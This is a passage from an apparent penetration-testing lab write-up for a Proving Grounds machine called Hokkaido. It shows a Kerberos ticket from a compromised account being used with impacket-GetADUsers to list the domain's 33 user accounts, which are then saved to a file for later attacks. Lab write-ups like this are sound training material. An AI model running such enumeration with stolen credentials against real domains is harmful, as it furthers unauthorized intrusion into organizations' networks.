Username Extraction
Extracting domain users using the TGT of the compromised info account
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-GetADUsers HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -all
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[*] Querying DC for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2023-12-06 16:56:28.952979 2025-04-25 13:35:18.027969
Guest <never> <never>
krbtgt 2023-11-25 14:11:55.164856 <never>
Hazel.Green 2023-12-06 17:34:46.565497 <never>
Molly.Smith 2023-11-25 14:34:13.208684 <never>
Alexandra.Little 2023-11-25 14:34:13.257776 <never>
Victor.Kelly 2023-11-25 14:34:17.397712 <never>
Catherine.Knight 2023-11-25 14:34:17.448586 <never>
Angela.Davies 2023-11-25 14:34:17.498859 <never>
Molly.Edwards 2023-11-25 14:34:17.545799 <never>
Tracy.Wood 2023-11-25 14:34:17.590713 <never>
Lynne.Tyler 2023-11-25 14:34:17.641025 <never>
Charlene.Wallace 2023-11-25 14:34:17.701737 <never>
Cheryl.Singh 2023-11-25 14:34:17.748658 <never>
Sian.Gordon 2023-11-25 14:34:17.797686 <never>
Gordon.Brown 2023-11-25 14:34:17.843022 <never>
Irene.Dean 2023-11-25 14:34:17.889681 <never>
Anthony.Anderson 2023-11-25 14:34:17.933784 <never>
Julian.Davies 2023-11-25 14:34:17.981836 <never>
Hannah.O'Neill 2023-11-25 14:34:18.025848 <never>
Rachel.Jones 2023-11-25 14:34:18.073919 <never>
Declan.Woodward 2023-11-25 14:34:18.121665 <never>
Annette.Buckley 2023-11-25 14:34:18.171521 <never>
Elliott.Jones 2023-11-25 14:34:18.221805 <never>
Grace.Lees 2023-11-25 14:34:18.266917 <never>
Deborah.Francis 2023-11-25 14:34:18.311622 <never>
Bruce.Cartwright 2023-11-25 14:34:21.085790 <never>
Nigel.Brown 2023-11-25 14:34:21.130709 <never>
Derek.Wyatt 2023-11-25 14:34:21.175903 <never>
discovery 2023-12-06 16:42:56.221832 <never>
maintenance 2023-11-25 14:39:04.869703 <never>
hrapp-service 2023-11-25 15:14:40.086247 <never>
info 2023-12-06 16:43:50.659216 2025-04-25 14:51:03.388741 A total of 33 domain account.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ awk '{print $1}' t > users.txtSaving them into a file; users.txt